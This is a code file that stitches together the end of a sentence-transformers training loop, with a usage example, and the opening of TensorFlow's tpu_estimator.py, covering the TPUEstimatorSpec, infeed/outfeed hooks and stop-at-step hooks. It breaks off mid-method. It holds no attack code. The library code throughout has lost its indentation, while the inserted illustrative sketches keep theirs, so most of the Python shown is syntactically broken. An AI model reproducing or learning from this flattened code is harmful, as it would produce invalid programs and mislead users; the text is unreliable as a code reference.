{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
optimizer = optimizer_class(optimizer_grouped_parameters, **optimizer_params)
scheduler_obj = self._get_scheduler(optimizer, scheduler=scheduler, warmup_steps=warmup_steps, t_total=num_train_steps)
optimizers.append(optimizer)
schedulers.append(scheduler_obj)
global_step = 0
data_iterators = [iter(dataloader) for dataloader in dataloaders]
num_train_objectives = len(train_objectives)
skip_scheduler = False
for epoch in trange(epochs, desc="Epoch"):
training_steps = 0
for loss_model in loss_models:
loss_model.zero_grad()
loss_model.train()
for _ in trange(steps_per_epoch, desc="Iteration", smoothing=0.05):
for train_idx in range(num_train_objectives):
loss_model = loss_models[train_idx]
optimizer = optimizers[train_idx]
scheduler = schedulers[train_idx]
data_iterator = data_iterators[train_idx]
try:
data = next(data_iterator)
except StopIteration:
#logging.info("Restart data_iterator")
data_iterator = iter(dataloaders[train_idx])
data_iterators[train_idx] = data_iterator
data = next(data_iterator)
features, labels = batch_to_device(data, self._target_device)
if use_amp:
with autocast():
loss_value = loss_model(features, labels)
scale_before_step = scaler.get_scale()
scaler.scale(loss_value).backward()
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(loss_model.parameters(), max_grad_norm)
scaler.step(optimizer)
scaler.update()
skip_scheduler = scaler.get_scale() != scale_before_step
else:
loss_value = loss_model(features, labels)
loss_value.backward()
torch.nn.utils.clip_grad_norm_(loss_model.parameters(), max_grad_norm)
optimizer.step()
optimizer.zero_grad()
if not skip_scheduler:
scheduler.step()
training_steps += 1
global_step += 1
if evaluation_steps > 0 and training_steps % evaluation_steps == 0:
self._eval_during_training(evaluator, output_path, save_best_model, epoch,
training_steps, callback)
for loss_model in loss_models:
loss_model.zero_grad()
loss_model.train()
self._eval_during_training(evaluator, output_path, save_best_model, epoch, -1, callback)
def evaluate(self, evaluator: SentenceEvaluator, output_path: str = None):
"""
Evaluate the model
:param evaluator:
the evaluator
:param output_path:
the evaluator can write the results to this path
"""
if output_path is not None:
os.makedirs(output_path, exist_ok=True)
return evaluator(self, output_path)
def _eval_during_training(self, evaluator, output_path, save_best_model, epoch, steps, callback):
"""Runs evaluation during the training"""
if evaluator is not None:
score = evaluator(self, output_path=output_path, epoch=epoch, steps=steps)
if callback is not None:
callback(score, epoch, steps)
if score > self.best_score:
self.best_score = score
if save_best_model:
self.save(output_path)
@staticmethod
def _get_scheduler(optimizer, scheduler: str, warmup_steps: int, t_total: int):
"""
Returns the correct learning rate scheduler. Available scheduler: constantlr, warmupconstant, warmuplinear, warmupcosine, warmupcosinewithhardrestarts
"""
scheduler = scheduler.lower()
if scheduler == 'constantlr':
return transformers.get_constant_schedule(optimizer)
elif scheduler == 'warmupconstant':
return transformers.get_constant_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps)
elif scheduler == 'warmuplinear':
return transformers.get_linear_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
elif scheduler == 'warmupcosine':
return transformers.get_cosine_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
elif scheduler == 'warmupcosinewithhardrestarts':
return transformers.get_cosine_with_hard_restarts_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
else:
raise ValueError("Unknown scheduler {}".format(scheduler))
@property
def device(self) -> device:
"""
Get torch.device from module, assuming that the whole module has one device.
"""
try:
return next(self.parameters()).device
except StopIteration:
# For nn.DataParallel compatibility in PyTorch 1.5
def find_tensor_attributes(module: nn.Module) -> List[Tuple[str, Tensor]]:
tuples = [(k, v) for k, v in module.__dict__.items() if torch.is_tensor(v)]
return tuples
gen = self._named_members(get_members_fn=find_tensor_attributes)
first_tuple = next(gen)
return first_tuple[1].device
@property
def tokenizer(self):
"""
Property to get the tokenizer that is used by this model
"""
return self._first_module().tokenizer
@tokenizer.setter
def tokenizer(self, value):
"""
Property to set the tokenizer that should be used by this model
"""
self._first_module().tokenizer = value
@property
def max_seq_length(self):
"""
Property to get the maximal input sequence length for the model. Longer inputs will be truncated.
"""
return self._first_module().max_seq_length
@max_seq_length.setter
def max_seq_length(self, value):
"""
Property to set the maximal input sequence length for the model. Longer inputs will be truncated.
"""
self._first_module().max_seq_length = value
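# --- Illustrative usage sketch (not part of the original module) ------------
# A minimal, hedged example of driving fit() above with one training objective,
# a dev evaluator and the (score, epoch, steps) callback described in its
# docstring. The toy sentences, the 'bert-base-uncased' checkpoint, the output
# path and the evaluator construction are assumptions based on the public
# sentence_transformers API of this era, not part of this module.
if __name__ == '__main__':
    from torch.utils.data import DataLoader
    from sentence_transformers import models, losses, evaluation
    from sentence_transformers.readers import InputExample

    word_embedding = models.Transformer('bert-base-uncased')
    pooling = models.Pooling(word_embedding.get_word_embedding_dimension())
    model = SentenceTransformer(modules=[word_embedding, pooling])

    train_examples = [
        InputExample(texts=['A plane is taking off.', 'An air plane is taking off.'], label=0.9),
        InputExample(texts=['A man is playing a flute.', 'A man is eating pasta.'], label=0.1),
    ]
    # fit() installs smart_batching_collate on this DataLoader (see above).
    train_dataloader = DataLoader(train_examples, shuffle=True, batch_size=2)
    train_loss = losses.CosineSimilarityLoss(model)

    dev_evaluator = evaluation.EmbeddingSimilarityEvaluator(
        sentences1=['A man is playing a guitar.'],
        sentences2=['Someone plays an instrument.'],
        scores=[0.8])

    def log_callback(score, epoch, steps):
        # Matches the (score, epoch, steps) callback contract documented above.
        print('eval score={:.4f} at epoch={} step={}'.format(score, epoch, steps))

    model.fit(train_objectives=[(train_dataloader, train_loss)],
              evaluator=dev_evaluator,
              epochs=1,
              warmup_steps=10,
              evaluation_steps=1,
              output_path='output/example-model',
              callback=log_callback)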
|
tpu_estimator.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""TPUEstimator class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import os
import signal
import sys
import threading
import time
import numpy as np
import six
from six.moves import queue as Queue # pylint: disable=redefined-builtin
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.contrib.tpu.proto import compilation_result_pb2 as tpu_compilation_result
from tensorflow.contrib.tpu.python.ops import tpu_ops
from tensorflow.contrib.tpu.python.ops import tpu_ordinal_selector_op
from tensorflow.contrib.tpu.python.tpu import _tpu_estimator_embedding
from tensorflow.contrib.tpu.python.tpu import error_handling
from tensorflow.contrib.tpu.python.tpu import functional as tpu_functional
from tensorflow.contrib.tpu.python.tpu import session_support
from tensorflow.contrib.tpu.python.tpu import tensor_tracer
from tensorflow.contrib.tpu.python.tpu import tpu
from tensorflow.contrib.tpu.python.tpu import tpu_config
from tensorflow.contrib.tpu.python.tpu import tpu_context
from tensorflow.contrib.tpu.python.tpu import tpu_feed
from tensorflow.contrib.tpu.python.tpu import training_loop
from tensorflow.contrib.tpu.python.tpu import util as util_lib
from tensorflow.contrib.tpu.python.tpu._tpu_estimator_embedding import AdamParameters # pylint: disable=unused-import
from tensorflow.contrib.tpu.python.tpu._tpu_estimator_embedding import EmbeddingConfigSpec # pylint: disable=unused-import
from tensorflow.contrib.training.python.training import hparam
from tensorflow.core.framework import variable_pb2
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session as tf_session
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.util import nest as data_nest
from tensorflow.python.estimator import estimator as estimator_lib
from tensorflow.python.estimator import model_fn as model_fn_lib
from tensorflow.python.estimator.export import export_output as export_output_lib
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import summary_ops_v2 as contrib_summary
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.summary import summary
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import evaluation
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training
from tensorflow.python.training import training_util
from tensorflow.python.util import function_utils
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
_INITIAL_LOSS = 1e7
_ZERO_LOSS = 0.
_TPU_ESTIMATOR = 'tpu_estimator'
_ITERATIONS_PER_LOOP_VAR = 'iterations_per_loop'
_BATCH_SIZE_KEY = 'batch_size'
_CTX_KEY = 'context'
_USE_TPU_KEY = 'use_tpu'
_CROSS_REPLICA_SUM_OP = 'CrossReplicaSum'
_ONE_GIGABYTE = 1024 * 1024 * 1024
_TPU_ENQUEUE_OPS = '_tpu_enqueue_ops'
_TPU_TRAIN_OP = '_tpu_train_op'
_REWRITE_FOR_INFERENCE_MODE = '_rewrite_for_inference'
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR = '_key_when_predictions_is_a_tensor'
# Ideally _USE_TPU_KEY should be reserved as well. However there are already
# models that make use of this key, thus it can not be reserved now to prevent
# breakage. In the long run, we would like to mitigate this by migrating models
# off of using _USE_TPU_KEY.
_RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY, _CTX_KEY]
# TODO(b/65703635): Flip the value and remove all dead code. Currently, this is
# only used for per-core based deployments. For per-host based pipelines, if a
# user returns a Dataset instance it will be automatically wrapped in a
# tf.while_loop (This can be disabled by returning features and labels
# explicitly).
_WRAP_INPUT_FN_INTO_WHILE_LOOP = False
ops.register_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR),
proto_type=variable_pb2.VariableDef,
to_proto=resource_variable_ops._to_proto_fn, # pylint: disable=protected-access
from_proto=resource_variable_ops._from_proto_fn) # pylint: disable=protected-access
def _is_iterable(obj):
"""A Python 2 and 3 compatible util to check whether `obj` is iterable."""
try:
iter(obj)
return True
except TypeError:
return False
class CatchInvalidHostcallFunctions(control_flow_ops.XLAControlFlowContext):
def AddOp(self, op):
if op.type in [
'AudioSummary', 'AudioSummaryV2', 'HistogramSummary', 'ImageSummary',
'MergeSummary', 'ScalarSummary', 'TensorSummary', 'TensorSummaryV2'
]:
raise ValueError('Use tf.contrib.summary inside of host_calls.')
def _create_global_step(graph):
graph = graph or ops.get_default_graph()
if training.get_global_step(graph) is not None:
raise ValueError('"global_step" already exists.')
# Create in proper graph and base name_scope.
with graph.as_default() as g, g.name_scope(None):
return variable_scope.get_variable(
ops.GraphKeys.GLOBAL_STEP,
shape=[],
dtype=dtypes.int64,
initializer=init_ops.zeros_initializer(),
trainable=False,
use_resource=True,
collections=[ops.GraphKeys.GLOBAL_VARIABLES, ops.GraphKeys.GLOBAL_STEP])
def _create_or_get_iterations_per_loop():
"""Creates or gets the iterations_per_loop variable.
In TPUEstimator, the user provided computation, the model_fn, is wrapped
inside a tf.while_loop for peak performance. The iterations of the loop are
specified by this variable, which adjusts its value on the CPU after each TPU
program execution and before the next TPU execution.
The purpose of using a variable, rather than a constant, is to allow
TPUEstimator to adapt the TPU training iterations according to the final steps
specified by users. For example, if the user sets the iterations_per_loop as 4
in TPUConfig and steps as 10 in TPUEstimator.train(), the iterations_per_loop
variable will have the following value before each TPU training.
- 1st TPU execution: iterations_per_loop = 4
- 2nd TPU execution: iterations_per_loop = 4
- 3rd TPU execution: iterations_per_loop = 2
As model_fn increases the global step once per train_op invocation, the global
step is 10 after all TPU executions, matching the steps=10 inputs passed in by
users.
Returns:
A TF non-trainable resource variable.
Raises:
RuntimeError: If multiple iterations_per_loop variables were found.
"""
graph = ops.get_default_graph()
collection_name = '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)
iter_vars = graph.get_collection(collection_name)
if len(iter_vars) == 1:
return iter_vars[0]
elif len(iter_vars) > 1:
raise RuntimeError('Multiple iterations_per_loop_var in collection.')
with ops.colocate_with(training_util.get_global_step()):
with variable_scope.variable_scope(
_TPU_ESTIMATOR, reuse=variable_scope.AUTO_REUSE):
return variable_scope.get_variable(
_ITERATIONS_PER_LOOP_VAR,
initializer=init_ops.zeros_initializer(),
shape=[],
dtype=dtypes.int32,
trainable=False,
collections=[collection_name, ops.GraphKeys.LOCAL_VARIABLES],
use_resource=True)
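# --- Illustrative sketch (not part of the original library code) ------------
# The docstring above walks through iterations_per_loop=4 with steps=10. The
# hypothetical helper below reproduces that bookkeeping on the host side: each
# loop runs min(remaining_steps, iterations_per_loop) iterations, which is also
# what `_TPUStopAtStepHook._next_iterations` computes further down in this file.
def _example_iterations_schedule(total_steps, iterations_per_loop):
  """Returns the per-loop iteration counts, e.g. (10, 4) -> [4, 4, 2]."""
  schedule = []
  remaining = total_steps
  while remaining > 0:
    schedule.append(min(remaining, iterations_per_loop))
    remaining -= schedule[-1]
  return schedule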
def _sync_variables_ops(ctx):
"""Create varriables synchronization ops.
Gets the variables back from TPU nodes. This means the variables updated
by TPU will now be *synced* to host memory.
In BROADCAST mode, we skip this sync since the variables are usually too
big to transmit via RPC.
Args:
ctx: A `_InternalTPUContext` instance with mode.
Returns:
A list of sync ops.
"""
if not ctx.is_input_broadcast_with_iterators():
return [
array_ops.check_numerics(v.read_value(),
'Gradient for %s is NaN' % v.name).op
for v in variables.trainable_variables()
]
else:
return [control_flow_ops.no_op()]
def _increase_eval_step_op(iterations_per_loop):
"""Returns an op to increase the eval step for TPU evaluation.
Args:
iterations_per_loop: Tensor. The number of eval steps running in TPU system
before returning to CPU host for each `Session.run`.
Returns:
An operation
"""
eval_step = evaluation._get_or_create_eval_step() # pylint: disable=protected-access
# Estimator.evaluate increases the eval step by 1 per run by default, so here we add the remaining difference.
return state_ops.assign_add(
eval_step,
math_ops.cast(iterations_per_loop - 1, dtype=eval_step.dtype),
use_locking=True)
def _extract_key_names(tensor_or_dict):
if isinstance(tensor_or_dict, dict):
return sorted(tensor_or_dict.keys())
return []
class _SIGNAL(object):
"""Signal used to control the thread of infeed/outfeed.
All preserved signals must be negative numbers. Positive numbers are used to
indicate the number of iterations for next training/evaluation loop.
"""
NEXT_BATCH = -1
STOP = -2
class TPUEstimatorSpec(model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
"""Ops and objects returned from a `model_fn` and passed to `TPUEstimator`.
See `EstimatorSpec` for `mode`, `predictions`, `loss`, `train_op`, and
`export_outputs`.
For evaluation, `eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`metric_fn` runs on CPU to generate metrics and `tensors` represents the
`Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`.
To be precise, TPU evaluation expects a slightly different signature from the
`tf.estimator.Estimator`. While `EstimatorSpec.eval_metric_ops` expects a
dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`.
The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The
`tensors` usually specify the model logits, which are transferred back from
TPU system to CPU host. All tensors must be batch-major, i.e., the batch
size is the first dimension. Once all tensors are available at CPU host from
all shards, they are concatenated (on CPU) and passed as positional arguments
to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is
a dict. `metric_fn` takes the `tensors` and returns a dict from metric string
name to the result of calling a metric function, namely a `(metric_tensor,
update_op)` tuple. See `TPUEstimator` for an MNIST example of how to specify the
`eval_metrics`.
`scaffold_fn` is a function running on CPU to generate the `Scaffold`. This
function should not capture any Tensors in `model_fn`.
`host_call` is a tuple of a `function` and a list or dictionary of `tensors`
to pass to that function; the function in turn returns a list of Tensors.
`host_call` currently works for train() and evaluate(). The function is
executed on the CPU host on every step, so there is communication overhead
when sending tensors from TPU to CPU. To reduce the overhead, try reducing the
size of the tensors. The `tensors` are concatenated along their major (batch)
dimension, and so must be >= rank 1. The `host_call` is useful for writing
summaries with `tf.contrib.summary.create_file_writer`.
"""
def __new__(cls,
mode,
predictions=None,
loss=None,
train_op=None,
eval_metrics=None,
export_outputs=None,
scaffold_fn=None,
host_call=None,
training_hooks=None,
evaluation_hooks=None,
prediction_hooks=None):
"""Creates a validated `TPUEstimatorSpec` instance."""
host_calls = {}
if eval_metrics is not None:
host_calls['eval_metrics'] = eval_metrics
if host_call is not None:
host_calls['host_call'] = host_call
_OutfeedHostCall.validate(host_calls)
training_hooks = tuple(training_hooks or [])
evaluation_hooks = tuple(evaluation_hooks or [])
prediction_hooks = tuple(prediction_hooks or [])
for hook in training_hooks + evaluation_hooks + prediction_hooks:
if not isinstance(hook, session_run_hook.SessionRunHook):
raise TypeError('All hooks must be SessionRunHook instances, given: {}'
.format(hook))
return super(TPUEstimatorSpec, cls).__new__(
cls,
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metrics=eval_metrics,
export_outputs=export_outputs,
scaffold_fn=scaffold_fn,
host_call=host_call,
training_hooks=training_hooks,
evaluation_hooks=evaluation_hooks,
prediction_hooks=prediction_hooks)
def as_estimator_spec(self):
"""Creates an equivalent `EstimatorSpec` used by CPU train/eval."""
host_calls = {}
if self.eval_metrics is not None:
host_calls['eval_metrics'] = self.eval_metrics
if self.host_call is not None:
host_calls['host_call'] = self.host_call
host_call_ret = _OutfeedHostCall.create_cpu_hostcall(host_calls)
eval_metric_ops = None
if self.eval_metrics is not None:
eval_metric_ops = host_call_ret['eval_metrics']
hooks = None
if self.host_call is not None:
hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])]
loss = self.loss
if tensor_tracer.TensorTracer.is_enabled() \
and self.train_op is not None:
tt = tensor_tracer.TensorTracer()
(loss, tracing_calls) = tt.trace_cpu(ops.get_default_graph(),
loss, self.train_op)
tracing_call_ret = _OutfeedHostCall.create_cpu_hostcall(tracing_calls)
tracing_functions = tracing_call_ret.values()
if tracing_functions:
if hooks:
hooks.extend([_OutfeedHostCallHook(tracing_functions)])
else:
hooks = [_OutfeedHostCallHook(tracing_functions)]
hooks = tuple(hooks or [])
scaffold = self.scaffold_fn() if self.scaffold_fn else None
return model_fn_lib.EstimatorSpec(
mode=self.mode,
predictions=self.predictions,
loss=loss,
train_op=self.train_op,
eval_metric_ops=eval_metric_ops,
export_outputs=self.export_outputs,
scaffold=scaffold,
training_hooks=self.training_hooks + hooks,
evaluation_hooks=self.evaluation_hooks + hooks,
prediction_hooks=self.prediction_hooks + hooks)
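# --- Illustrative sketch (not part of the original library code) ------------
# A hedged, user-side example of constructing the `TPUEstimatorSpec` defined
# above: it shows the (metric_fn, tensors) form of `eval_metrics` and a simple
# `host_call` writing a scalar summary on the CPU host, as described in the
# class docstring. The layer/optimizer choices, the '/tmp/example_summaries'
# log dir and the name `_example_tpu_model_fn` are assumptions for
# illustration only.
def _example_tpu_model_fn(features, labels, mode, params):
  import tensorflow as tf  # assumed available in the user's program
  del params  # unused in this sketch
  logits = tf.layers.dense(features['x'], units=10)
  loss = tf.losses.sparse_softmax_cross_entropy(labels=labels, logits=logits)
  if mode == model_fn_lib.ModeKeys.TRAIN:
    optimizer = tf.contrib.tpu.CrossShardOptimizer(
        tf.train.GradientDescentOptimizer(learning_rate=0.01))
    train_op = optimizer.minimize(
        loss, global_step=tf.train.get_global_step())

    def host_call_fn(gs, loss_t):
      # Runs on the CPU host; tensors arrive batch-major (rank >= 1), one
      # entry per shard, hence the reduce_mean below.
      with tf.contrib.summary.create_file_writer(
          '/tmp/example_summaries').as_default():
        with tf.contrib.summary.always_record_summaries():
          tf.contrib.summary.scalar('loss', tf.reduce_mean(loss_t), step=gs[0])
          return tf.contrib.summary.all_summary_ops()

    gs_t = tf.reshape(tf.train.get_global_step(), [1])
    loss_t = tf.reshape(loss, [1])
    return TPUEstimatorSpec(mode=mode, loss=loss, train_op=train_op,
                            host_call=(host_call_fn, [gs_t, loss_t]))

  def metric_fn(labels, logits):
    # Runs on the CPU host over tensors concatenated from all shards.
    predictions = tf.argmax(logits, axis=-1)
    return {'accuracy': tf.metrics.accuracy(labels=labels,
                                            predictions=predictions)}

  return TPUEstimatorSpec(mode=mode, loss=loss,
                          eval_metrics=(metric_fn, [labels, logits]))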
class _OpQueueContext(object):
"""Manages work queue and thread for a infeed/outfeed thread."""
def __init__(self, name, target, args):
self._name = name
self._queue = Queue.Queue()
args = (self,) + args
self._thread = threading.Thread(name=name, target=target, args=args)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._queue.put(_SIGNAL.STOP)
def send_next_batch_signal(self, iterations):
self._queue.put(iterations)
def read_iteration_counts(self):
while True:
iterations = self._queue.get(block=True)
logging.debug('%s read iterations %s', self._name, iterations)
if iterations == _SIGNAL.STOP:
logging.info('%s received shutdown signal, stopping.', self._name)
return
yield iterations
def join(self):
logging.info('Shutting down %s thread.', self._name)
self.stop()
self._thread.join()
class _OpSignalOnceQueueContext(_OpQueueContext):
"""Manages work queue and thread for a infeed/outfeed thread.
This subclass only signals once.
"""
def __init__(self, name, target, args):
super(_OpSignalOnceQueueContext, self).__init__(name, target, args)
self._has_signaled = False
def send_next_batch_signal(self, iterations):
if not self._has_signaled:
self._queue.put(iterations)
self._has_signaled = True
class TPUInfeedOutfeedSessionHook(session_run_hook.SessionRunHook):
"""A Session hook setting up the TPU initialization, infeed, and outfeed.
This hook does two major things:
1. initialize and shutdown TPU system.
2. launch and join the threads for infeed enqueue and (optional) outfeed
dequeue.
"""
def __init__(self,
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op,
run_infeed_loop_on_coordinator=True,
rendezvous=None,
master=None,
session_config=None,
tpu_init_ops=None):
self._master_job = ctx.master_job
self._enqueue_ops = enqueue_ops
self._dequeue_ops = dequeue_ops
self._rendezvous = rendezvous
self._master = master
self._session_config = session_config
self._init_ops = list(tpu_init_ops or [])
if ctx.embedding_config is None:
self._embedding_layer_config = None
else:
self._embedding_layer_config = (
ctx.embedding_config.tpu_embedding.config_proto)
self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator
self._initial_infeed_sleep_secs = (
ctx.config.tpu_config.initial_infeed_sleep_secs)
self._feed_error = None
self._finished = False
# When using model parallelism, the TPU is pre-initialized at startup to
# fetch mesh information. We skip re-initializing it here to avoid
# suspected issues due to the mesh layout changing on the second
# initialization.
self._should_initialize_tpu = not ctx.model_parallelism_enabled
self._tpu_compile_op = tpu_compile_op
def begin(self):
logging.info('TPU job name %s', self._master_job)
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
if self._should_initialize_tpu:
self._finalize_ops = [tpu.shutdown_system(job=self._master_job)]
else:
self._finalize_ops = []
summary_writer_init_ops = contrib_summary.summary_writer_initializer_op()
self._init_ops.extend(summary_writer_init_ops)
# Get all the writer resources from the initializer, so we know what to
# flush.
for op in summary_writer_init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def _run_infeed(self, queue_ctx, session):
logging.info('Starting infeed thread controller.')
if self._initial_infeed_sleep_secs:
logging.info('Infeed thread sleeping for %d seconds.',
self._initial_infeed_sleep_secs)
time.sleep(self._initial_infeed_sleep_secs)
logging.info('Infeed thread starting after sleep')
with self._rendezvous.catch_errors(source='infeed', session=session):
if self._run_infeed_loop_on_coordinator:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Infeed enqueue for iteration (%d, %d)', count, i)
session.run(self._enqueue_ops)
else:
for _ in queue_ctx.read_iteration_counts():
session.run(self._enqueue_ops)
logging.info('Infeed thread finished, shutting down.')
def _run_outfeed(self, queue_ctx, session):
logging.info('Starting outfeed thread controller.')
with self._rendezvous.catch_errors(source='outfeed', session=session):
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Outfeed dequeue for iteration (%d, %d)', count, i)
session.run(self._dequeue_ops)
logging.info('Outfeed thread finished, shutting down.')
def _create_infeed_controller(self, name, target, args):
return _OpQueueContext(name=name, target=target, args=args)
def _assertCompilationSucceeded(self, result, coord):
proto = tpu_compilation_result.CompilationResultProto()
proto.ParseFromString(result)
if proto.status_error_message:
logging.error('Compilation failed: {}'.format(proto.status_error_message))
coord.request_stop()
else:
logging.info('Compilation succeeded')
def after_create_session(self, session, coord):
if self._should_initialize_tpu:
logging.info('Init TPU system')
start = time.time()
with ops.Graph().as_default():
with tf_session.Session(
self._master, config=self._session_config) as sess:
sess.run(
tpu.initialize_system(
job=self._master_job,
embedding_config=self._embedding_layer_config))
logging.info('Initialized TPU in %d seconds', time.time() - start)
session.run(self._init_ops,
options=config_pb2.RunOptions(timeout_in_ms=5 * 60 * 1000))
if os.environ.get('TPU_SPLIT_COMPILE_AND_EXECUTE', '') == '1':
logging.info('Compiling user program: this may take a while...')
self._assertCompilationSucceeded(session.run(self._tpu_compile_op), coord)
self._infeed_controller = self._create_infeed_controller(
name='InfeedController', target=self._run_infeed, args=(session,))
self._outfeed_controller = _OpQueueContext(
name='OutfeedController', target=self._run_outfeed, args=(session,))
# Enable the worker watchdog to terminate workers on coordinator exit.
watchdog_timeout = int(os.environ.get('TF_TPU_WATCHDOG_TIMEOUT', '0'))
if watchdog_timeout > 0:
session_support.start_worker_watchdog(session,
shutdown_timeout=watchdog_timeout)
def before_run(self, run_context):
self._feed_error = None
iterations = run_context.session.run(self._iterations_per_loop_var)
logging.info('Enqueue next (%d) batch(es) of data to infeed.', iterations)
self._infeed_controller.send_next_batch_signal(iterations)
logging.info('Dequeue next (%d) batch(es) of data from outfeed.',
iterations)
self._outfeed_controller.send_next_batch_signal(iterations)
def end(self, session):
self._finished = True
logging.info('Stop infeed thread controller')
self._infeed_controller.join()
self._rendezvous.record_done('infeed')
logging.info('Stop output thread controller')
self._outfeed_controller.join()
self._rendezvous.record_done('outfeed')
logging.info('Shutdown TPU system.')
session.run(self._finalize_ops)
class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook):
def __init__(self, ctx, enqueue_ops, dequeue_ops, tpu_compile_op,
rendezvous=None, master=None, session_config=None):
super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__(
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op=tpu_compile_op,
run_infeed_loop_on_coordinator=False,
rendezvous=rendezvous,
master=master,
session_config=session_config)
def _create_infeed_controller(self, name, target, args):
return _OpSignalOnceQueueContext(name=name, target=target, args=args)
class _TPUStopAtStepHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step.
This hook is similar to the `session_run_hook._StopAfterNEvalsHook` with
the following differences for TPU training:
1. This hook sets the variable for iterations_per_loop, which is used by
`TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed.
As the hook execution order is not guaranteed, the variable update is
handled in `after_create_session` and `after_run` as
`TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`.
2. For each training loop (session.run), the global step could be increased
multiple times on TPU. The global step tensor value will be explicitly read
again in `after_run` to ensure the latest value is retrieved to avoid race
condition.
"""
def __init__(self, iterations, num_steps=None, last_step=None):
"""Initializes a `StopAtStepHook`.
Args:
iterations: The number of iterations to run optimizer per training loop.
num_steps: Number of steps to execute.
last_step: Step after which to stop.
Raises:
ValueError: If one of the arguments is invalid.
"""
if num_steps is None and last_step is None:
raise ValueError('One of num_steps or last_step must be specified.')
if num_steps is not None and last_step is not None:
raise ValueError('Only one of num_steps or last_step can be specified.')
self._num_steps = num_steps
self._last_step = last_step
self._iterations = iterations
def _next_iterations(self, global_step, last_step):
gap = last_step - global_step
return min(gap, self._iterations)
def begin(self):
self._global_step_tensor = training_util.get_global_step()
if self._global_step_tensor is None:
raise RuntimeError('Global step should be created.')
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
global_step = session.run(self._global_step_tensor)
if self._last_step is None:
self._last_step = global_step + self._num_steps
iterations = self._next_iterations(global_step, self._last_step)
self._iterations_per_loop_var.load(iterations, session=session)
def after_run(self, run_context, run_values):
# Global step cannot be retrieved via SessionRunArgs and before_run due to
# race condition.
global_step = run_context.session.run(self._global_step_tensor)
if global_step >= self._last_step:
run_context.request_stop()
else:
iterations = self._next_iterations(global_step, self._last_step)
self._iterations_per_loop_var.load(
iterations, session=run_context.session)
class _SetEvalIterationsHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step."""
def __init__(self, num_steps):
"""Initializes a `_SetEvalIterationsHook`.
Args:
num_steps: Number of steps to execute.
"""
self._num_steps = num_steps
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
self._iterations_per_loop_var.load(self._num_steps, session=session)
class _StoppingPredictHook(session_run_hook.SessionRunHook):
"""Hook that requests stop according to the stopping signal in prediction."""
def __init__(self, scalar_stopping_signal):
self._scalar_stopping_signal = scalar_stopping_signal
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
# This is not necessary as we do not run infeed enqueue and outfeed dequeue
# in side threads for the prediction model. But it makes the
# TPUInfeedOutfeedSessionHook print a nicer message.
self._iterations_per_loop_var.load(1, session=session)
def before_run(self, run_context):
return session_run_hook.SessionRunArgs(self._scalar_stopping_signal)
def after_run(self, run_context, run_values):
_ = run_context
scalar_stopping_signal = run_values.results
if _StopSignals.should_stop(scalar_stopping_signal):
# NOTE(xiejw): In prediction, stopping signals are inserted for each
# batch. And we append one more batch to signal the system it should stop.
